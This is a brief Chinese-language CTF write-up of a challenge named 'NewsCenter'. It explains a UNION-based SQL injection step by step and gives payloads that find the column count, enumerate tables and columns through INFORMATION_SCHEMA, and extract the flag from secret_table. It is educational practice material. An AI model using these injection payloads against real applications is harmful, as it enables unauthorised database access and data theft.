NewsCenter
这一题考察的是 SQL 注入
首先用 ' and 0 union select 1,2,3 #
来初步判断该sql查询返回三列数据
然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
得到表名,很明显我们需要得到 secret_table
表中的内容
再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
得到 secret_table
表的列名以及数据类型
最后就可以简单粗暴地得到flag
' and 0 union select 1,2,fl4g from secret_table #